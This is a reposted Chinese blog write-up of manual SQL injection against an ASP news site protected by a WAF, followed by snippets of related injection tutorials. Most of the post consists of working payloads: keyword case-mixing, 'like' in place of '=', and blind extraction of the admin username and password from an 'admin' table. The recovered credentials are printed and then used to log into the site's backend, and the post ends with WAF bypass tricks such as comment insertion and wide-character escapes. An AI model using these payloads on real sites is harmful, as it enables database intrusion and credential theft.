一次手工注入waf [转载]
转载自sss安全论坛
目标站点:http://www.xxx.cn:88
注入点:
http://www.xxx.cn:88/new/details1.asp?n_id=49909
对其进行检测:http://www.xxx.cn:88/new/details1.asp?n_id=49909’
发现有waf,测试and 1=1 和 and 1=2 , and 和 = 也被检测出来,
尝试大写和like代替and
Payload:http://www.xxx.cn:88/new/details1.asp?n_id=49909 And 1 like 1
Payload:http://www.xxx.cn:88/new/details1.asp?n_id=49909 And 1 like 2
... Select Top 1 len(admin) from admin)>5 返回正常
... Select Top 1 len(admin) from admin)>6 返回错误 说明len(admin)=6
以相同的方法得到len(password)=10,len(user)=3
猜解字段的值:
与猜解字段同理
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,1,1)) from admin)>119 返回正确
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,1,1)) from admin)>120 返回错误
说明admin字段记录的第一个字符打ascii是120
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,N,1)) from admin)>n N [1,6]
依次测出admin六个字符的ascii值,查表得 admin=xuancb
根据上述方法测的password=118000jjtu, user=dbo (数据库管理员)
扫到后台后用admin和password登录
心得:在手工测试中无可避免地要与waf...打交道,是件很头疼的事,但机器总归机器,我们灵活运用大小写混杂、注释符混杂、多重编码、等价替换等方法还是可以绕过的。
大小写混杂: and----->And,select->Select,...
注释符混杂(安全狗可过):and/**a*/order by ,union/**a*/select...
宽字符:当网站对 ’ 转义 / ’ 时,使用%5d’ 会被编码两次 打到注入目的。
一些常见的等见 “=” = like, and = && , or = ||
这篇文章还是很不错的一个典型bypass waf的案例。涨姿势了。
转载于:https://www.cnblogs.com/xishaonian/p/6075506.html
一次手工注入waf [转载]相关推荐
- 记一次MySQL手工注入
本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎) 小 ...
- 教程是php手工注入
大家好,今天给大家带的教程是php手工注入,看了这个教程你会在不用工具的情况下, 拿下一般的php网站!!! 目标网站:http://www.atextile.org.cn:81 注入点: http ...
- 【运维安全】-MySQL手工注入
为什么要学习手工注入? 工具:sqlmap万能密码,直接登录到后台页面,不需要密码:admin' or 1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录. 当输入admin,ad ...
- Access手工注入
access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新. 实验环境:win2008R2虚拟机,物理机(也就是我的win10). 搭建环境用的是access+asp源码. 环境搭建可以参照这里, ...
- 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...
- 某网站安全检测之数据库手工注入
某网站安全检测之数据库手工注入 一.引子 长夜慢慢,无心睡眠-- 无意中翻到几年前听的一首名为<祖先的阴影>的摇滚,这么长久的历史,混合着许多的罪恶与功绩:这么"灿 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- 全网最全的SQL手工注入总结!(收藏这篇就够了!)
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要.本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
最新文章
- linux简单目录,Linux下各目录简单整理
- 计算机网络分类(按覆盖范围分类)“名称、范围”
- 比特币要升级成为“比特币现金”
- 如果你现在学Android---学习使用Kotlin进行Android开发
- 辅助Visual Studio 2017部署的DevOps新工具
- Codeforces Round #453 (Div. 1) D. Weighting a Tree 构造 + dfs树
- 【Matlab】设置绘图窗口大小及颜色
- python求数组标准差
- windows 7 下 .net 开发环境的搭建
- 一文掌握 Docker 技术体系
- java中映射getproperty,PropertyUtils.getProperty和PropertyUtils.setProperty的用法详解
- 推荐Python、Django中文文档地址
- 2022年NPS基准:NPS分数达到多少算好?
- ruoyi框架集成magic-api
- java外卖项目介绍_JavaWeb网上订餐系统项目
- Seaweeds配置部署
- Unity实现瞄准镜效果
- C#基于虹软SDK的人脸识别签到系统
- c/c++ sprintf sprintf_s
- 视频编解码标准情况概述
热门文章
- matlab quantile_Matlab:空间计量经济学工具箱命令汇总
- B2B2C商城系统 -多端+多店+社交+新零售网上商城开发
- 复旦计院2020机试真题
- java经典问题国王_动态规划-国王的金矿问题java
- 淘宝网前端开发面试题
- 使用jTessBoxEditorFX-2.2.0制作自己的字库
- ubuntu避免每次都输入sudo
- antd vue upload组件上传视频并实现视频预览
- Excel如何间隔插入空白行
- 远程桌面无法连接到远程计算机,因为从远程计算机接受的身份验证证书,仅允许运行使用网络级别身份验证的远程桌面计算机连接失败处理方法(远程桌面连接)...